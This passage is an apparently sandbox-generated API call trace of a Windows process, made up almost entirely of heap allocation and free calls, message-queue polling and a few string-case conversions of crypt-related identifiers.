hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0166.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0166.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0166.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0166.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0166.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0166.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0166.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0166.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0166.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0166.889] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0166.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0166.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0166.889] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0166.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0166.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0166.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0166.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0166.890] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0166.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0166.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.890] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0166.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0166.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0166.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd900 [0166.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0166.890] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0166.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0166.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0166.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0166.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0166.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0166.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0166.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0166.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5b8 [0166.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba078 [0166.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0166.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0166.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0166.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdac8 [0166.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0166.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0166.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0166.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0166.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0166.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0166.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0166.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0166.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0166.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0166.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0166.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0166.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0166.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0166.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0166.891] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0166.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0166.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0166.892] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0166.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0166.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0166.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0166.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0166.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd900 [0166.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0166.892] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0166.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0166.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0166.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0166.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0166.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0166.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0166.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0166.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0166.893] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0166.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0166.893] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0166.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0166.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0166.893] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0166.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0166.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0166.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0166.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0166.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0166.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0166.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0166.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0166.893] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0166.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0166.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0166.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0166.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0166.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0166.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0166.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0166.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0166.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0166.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0166.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0166.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0166.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0166.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0166.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0166.895] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0166.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0166.895] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0166.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0166.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0166.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0166.895] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0166.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0166.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0166.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4f8 [0166.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0166.896] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0166.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0166.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0166.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0166.896] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0166.896] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0166.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.897] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.897] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.897] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0166.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.897] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 